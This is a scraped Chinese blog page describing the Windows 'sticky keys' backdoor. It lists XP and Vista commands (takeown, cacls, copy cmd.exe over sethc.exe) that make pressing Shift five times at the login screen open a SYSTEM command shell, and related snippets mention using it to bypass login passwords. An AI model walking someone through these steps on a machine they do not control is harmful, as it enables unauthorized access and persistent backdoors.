WINDOWS漏洞:粘置键

最新推荐文章于 2025-05-09 05:56:49 发布
最新推荐文章于 2025-05-09 05:56:49 发布
阅读量1w 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: WINDOWS应用 文章标签: windows shell xp 联想 cmd c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/scz123/article/details/1528695
本文介绍了一个Windows系统的安全漏洞,通过替换SetHC.exe文件为cmd.exe,用户可以在登录界面通过连续按下Shift键五次的方式启动命令行界面,从而获得shell权限。文中详细描述了在不同Windows版本中实现这一操作的具体步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://www.avertlabs.com/research/blog/?p=218

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%/system32/dllcache
ren sethc.exe *.ex~
cd %widnir%/system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:/windows/system32/sethc.exe
cacls c:/windows/system32/sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……
windows操作系统实验之粘滞漏洞
m0_55525922的博客
04-13 612
Windows系统登录界面状态下,粘滞仍可以以连续按5下SHIFT运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算。找到名字为sethc的文件(随便点击一个文件,按s就可以快速查找s开头的文件),也就是粘滞,把文件名改成任意名。选择计算机——d盘(也就是平时系统的c盘)————windows目录——System32目录,是计算机最高的权限,那么就可以输入命令修改账户的密码,或者新建一个用户,赋予它管理员的权限。
Windows服务详解
xj28555的博客
08-15 4247
Windows服务详解 在 “开始” 的 “运行” 中 输入: services.msc 进入XP自带服务修改列表 可以选择关闭,手动,还是自动. 自动为跟windows一起启动。 手动为需要时它自行启动。 关闭为永远不启动。 开始吧: alerter -错误警报器,垃圾,关闭。 application layer gateway service -给与第三者网络共享/防火墙支持的服务,有些防火墙/网络共享软件需要。占用1。5mb内存。 application management-用于设定,发布和删除软
粘滞漏洞,按5下shift后,windows就执行了system32下的sethc.exe
weixin_30781433的博客
06-19 486
粘滞漏洞,按5下shift后,windows就执行了system32下的sethc.exe Windows粘滞。是按5下shift后,windows就执行了system32下的sethc.exe。即使 在3389中,都可以弹出!! 它本来是为不方便按组合的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了...
关于windows粘滞后门漏洞
qq_52134654的博客
06-30 3251
漏洞仅适用于Windows7及以下的windows操作系统。粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区会出现粘滞图标。...
Win7 粘滞漏洞利用绕过登录密码
老司机开代码的博客
09-26 5219
文章目录1. 原理2. 利用 1. 原理 在win7登录界面,连按5次Shift,则会弹出粘滞提示。而此程序的路径位于c:\windows\system32路径下。可以将此程序的路径掉包成cmd,实现在登录界面弹出cmd命令行,重登录密码实现登录。 2. 利用 首先开启win7,在启动的过程中直接断电强制关机。然后再次启动,win7会出现一个修复的界面。我们选择修复排查问题那一选项。 然后windows会建议我们还原系统,这里选择取消。 取消后,会等待比较长的一段时间。 这里选择查看问题详细信息
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
《鸿蒙电脑:开启国产操作系统的崭新时代》
最新发布
zheng_ruiguo的专栏
05-09 2062
2025年5月8日,华为在深圳举行了鸿蒙电脑技术与生态沟通会,正式发布了首款搭载HarmonyOS操作系统的鸿蒙电脑。这款电脑的推出标志着华为在技术创新方面的又一重大突破,填补了国产操作系统在个人电脑领域的空白,打破了国外操作系统的垄断。鸿蒙电脑的问世是华为多年技术研发的成果,集结了超过10000名工程师和20多家研究所,投入巨量资金,布局了2700多项核心专利。它不仅在外观设计和硬件配上表现出色,还具备强大的跨设备协同能力,能够与手机、平板等设备无缝连接。鸿蒙电脑的发布是中国科技产业从“追赶者”向“引领
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配文件:[
操作系统交互指南:MASM实现系统调用的高级技巧
!... # 摘要 操作系统交互与MASM的深入研究,对于理解系统调用的机制与实现在不同操作系统中的应用至关重要。本文首先介绍了系统调用的概念与重要性,探讨了操作系统与用户空间的界限、系统调用在程序中的作用以及工作...
粘滞本地破解WINDOWS XP /2003/vista 密码
刘欢的专栏
12-04 4739
________________________________________________________________________________________________________ sanhen版_______________________________________________________________________________________
​​​​​​​‌粘滞后门漏洞复现
healthy_tudou的博客
10-14 667
粘滞后门漏洞主要影响Windows系统的Vista、Win7及以下版本。‌ 这种漏洞是通过替换Sethc.exe文件来实现的,当用户连续按5次Shift时,原本应弹出的粘滞功能会被黑客替换的应用程序所替代,从而留下后门,使黑客能够远程操纵计算机‌。(2)重启后显示界面,此时立刻选择启动启动修复,在倒计时结束前enter。
粘滞漏洞
zhuge_long的专栏
08-30 530
原理:利用粘滞调出cmd,在cmd里对用户进行操作,达到创建,修改用户等目的,从而绕过登录系统的密码,直接用自己创建出来的用户登录计算机。
计算机按了一样,电脑总是自动重复按盘上的一个 经验告诉你该这样...
热门推荐
weixin_42303003的博客
07-29 2万+
电脑开机打字的时候,有时候会遇到,重复的自动打同一个字或者字母,根本停不下来的情况,这种情况持续了好多天,要怎么解决呢?工具/材料腾讯电脑管家检查盘内部按01出现这种情况,很可能是卡引起的,我的其实就是卡,是盘里面的硅胶垫给卡住了,我们可以拿一个细点的小一字改锥撬动盘按02撬动之后,如果你是薄膜盘的话,就会看到下面有一个白色的按,把他平铺的方式放好,如果破损了就只能换一个了,如果...
windows粘滞提权的尝试与思考
Sp4rkW的博客
02-07 8165
前言 早上地铁上看到了安全客的一篇文章,从一道高质量的ctf题中看渗透测试,虽然只是一道ctf题,但是对其中提到的粘滞提权十分好奇,这里对其做了一个简单的实验~ 原理 windows下连续按五次shift会调用c:\windows\system32\sethc.exe 在我们已经登录系统时,这个程序是以我们自己的用户权限运行的。 但是当我们未登陆系统(停留在登陆界面)的时候 系统还
在VMware中,双击鼠标左,ctrl粘滞问题
ukoyi的博客
09-21 3603
在虚拟机下开发程序时,发现盘输入异常。后发现是双击鼠标左时,ctrl粘滞所致。 网上搜索解决方案是:                                  在VMvare中 选择“虚拟机” -》 “设” -》“选项” -》“使用增强型盘” 由于本人VMware中未安装“增强型盘‘组件,故该解决方案未进行验证。 之前虚拟机运行是正常的,于是分析导致该异
解决操作系统无法打开.exe可执行文件的方法
yusiyu的技术专栏
02-21 1万+
今天一同事电脑出现严重问题,打开我的电脑后弹出一个对话框说“无法找到C:\WINDOWS\system32\rundll32.exe”,然后打开一些已经安装的软件程序却弹出一个让你选择打开方式的对话框,瑞星杀毒软件被禁用,整个机子像瘫痪了一样,无法运行任何程序。其实这是病毒或木马对exe文件打开方式进行了修改,导致无法打开任何可执行文件。经过研究终于找到解决方法。     一般朋友遇到此类问
利用win7shift粘滞漏洞破解系统密码
星|Donstpast
03-27 3279
你需要知道的一些东西: 1.粘滞:c:\windows\system32\stthc.exe 2.cmd路径:c:\windows\system32\cmd 3.用户密码储存位:c:\windows\system32\config\SAM 4.修改用户密码的命令:net user 用户名 密码 本次实验环境 实验原理 这是一次关于提权的尝试。shift粘滞漏洞windows系统一个经典...
第一篇博客:windows 7的5次shift漏洞
wlp_wangyue的博客
10-02 1324
第一篇博客:Windows 5次shift漏洞。这个漏洞我是在看网络安全相关视频看到的,在windows登录界面连续按5次shift,会弹出“粘滞”的框,利用这个弹窗和windows的系统恢复功能来篡改C:\Windows\System32下的sethc的文件名,利用命令行创建新的账户,以此来绕过之前的账户密码登录。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值